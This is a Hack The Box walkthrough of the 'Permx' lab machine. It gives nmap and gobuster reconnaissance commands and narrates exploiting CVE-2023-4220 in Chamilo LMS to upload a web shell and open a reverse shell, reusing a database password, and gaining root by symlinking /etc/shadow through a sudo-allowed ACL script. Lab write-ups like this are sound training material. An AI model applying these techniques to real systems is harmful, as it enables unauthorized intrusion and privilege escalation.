Skip to content
Home » Hack The Box: Permx Machine Walkthrough – Easy Difficulty

Hack The Box: Permx Machine Walkthrough – Easy Difficulty

Reading Time: 7 minutes

Introduction to Permx:

In this write-up, we will explore the “Permx” machine from Hack The Box, categorized as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.

Objective:

The goal of this walkthrough is to complete the “Permx” machine from Hack The Box by achieving the following objectives:

User Flag:

CVE-2023-4220 Exploitation

  • Identify the web technology that allows a single IP address to host multiple host names and enumerate to find other host names.
  • The target’s Apache server permits index listing, allowing file reading in open directories. Check for robots.txt and explore various directories to determine the server version; also, review the documentation for further insights.
  • Research CVEs associated with this web application, examining the CVE documentation to find relevant ones based on the prerequisite conditions of the web server.

Root Flag:

Using ACL and Symlinks for Privilege Escalation:

  • The script allows changing the ACL for a file within the user mtz’s home directory, enabling us to grant ourselves read, write, and execute permissions on any file in /home/mtz.
  • To bypass this restriction, we can use symbolic links (symlinks), which are similar to Windows file shortcuts, creating a pointer to another file or directory.
  • This functionality is beneficial for the acl.sh script, as we can create a symlink in /home/mtz pointing to any other file, allowing us to gain read, write, and execute permissions.
  • I tested this approach by creating a symlink to /etc/shadow, successfully view and edit its contents.

Enumerating the Permx Machine

Reconnaissance:

Nmap Scan:

Begin with a network scan to identify open ports and running services on the target machine. 

nmap -sC -sV -oN nmap_initial.txt 10.10.11.23

Nmap Output: 

┌─[darknite@parrot]─[~/Documents/htb/Permx]
└──╼ $nmap -sV -sC 10.10.11.23 -oA initial 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-31 03:53 EDT
Nmap scan report for permx.htb (10.10.11.23)
Host is up (0.17s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
|_  256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: eLEARNING
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.74 seconds

Analysis:

  • Port 22 (SSH): Secure remote access via OpenSSH 8.9p1 on Ubuntu.
  • Port 80 (HTTP): Web server running Apache 2.4.52 serving eLEARNING.

Web Enumeration:

Perform web enumeration to discover potentially exploitable directories and files.


  gobuster vhost -u http://10.10.11.23 -w /usr/share/wordlists/dirb/common.txt

Gobuster Output:

The output contains numerous entries, primarily with status 302.

No entries were found with status 200.

Analysis:

  • www: No new content found.
  • LMS: Hosted an instance of Chamilo LMS.

Exploitation

Web Application Exploration:

After exploring the site, no exciting functionality was identified. A contact form is available, though it yielded no useful results for further action.

The curl command request and response didn’t provide any notable information.

The subdomain will appear similar to what is shown above.

In the corner, there’s a note indicating that the administrator for Chamilo is Davis Miller, with a link to his email: admin@permx.htb.

Let’s enumerate the directory on this subdomain and found the /documentation directory to be quite intriguing.

The documentation page will resemble the example depicted in the screenshot above.

I looked up recent vulnerabilities for Chamilo and discovered CVE-2023-4220, along with a proof of concept (POC) demonstrating an unrestricted file upload. This POC allows the upload of a PHP web shell, which can result in remote code execution (RCE).

Exploit for Chamilo LMS Unrestricted File Upload Vulnerability (CVE-2023-4220)

This exploit focuses on the unrestricted file upload vulnerability found in the large file upload feature of Chamilo-LMS, particularly in the /main/inc/lib/javascript/bigupload/inc/bigUpload.php path for versions of Chamilo LMS that are 1.11.24 or earlier. By uploading a web shell, attackers can gain remote code execution and upload arbitrary files to the /main/inc/lib/javascript/bigupload/files directory.

To test the exploit, I set up a Python web server that was found here and attempted to obtain a callback.

There are a few files exploited by others, but let’s upload our own malicious files to the folder.

Let’s download the exploit script to our local machine.

Let’s run the Python script.

Consequently, we should test by running python3 main.py -u <domain> -a scan, which will produce the output shown above.

Let’s upload the web shell to the victim’s machine.

The malicious file has been successfully uploaded to the application.

We have successfully obtained the ability to execute command injection on the machine.

Let’s inject our reverse shell code into the application.

We have successfully established a reverse shell connection back to our machine.

As the www-data user, I couldn’t access the user flag, so I began exploring the files for Chamilo to check for any interesting details in the configuration files.

In /var/www/chamilo/cli-config.php, I discovered references to /app/config/configuration.php, which are likely to contain the SQL credentials.

I used the credentials to log into the local SQL database which isn’t externally accessible. I explored the Chamilo database and found several tables, including a user table with password hashes, but couldn’t crack them or find any other valuable information.

Eventually, I returned to the host and discovered the user mtz.

I attempted to reuse the SQL password for mtz and was able to log in successfully

We can view the user flag by executing the command cat user.txt.

Escalate to Root Privileges Access on Permx Machine

Privilege Escalation:

In an attempt to gain access to the root user, I checked my sudo privileges using the command sudo -l. I noticed that I can execute the /opt/acl.sh file without a password.

This script takes the user, permissions, and target file as parameters to change the file’s permissions, but the target file must be in our home directory.

Let’s create a symbolic link to the sudoers file and modify its permissions for read and write access.

After granting our user all privileges.

The method for privilege escalation involves manipulating the script. I began researching the setfacl command and realized that I could assign permissions to a file. This means I could grant rwx permissions to a file using the sudo /opt/acl.sh script.

With this in mind, if I create a symlink to a file like /etc/shadow, I could potentially grant rwx permissions to that file, remove the password for the root account and then change my account to root to obtain the root flag.

We can view the root flag by executing the command cat root.txt.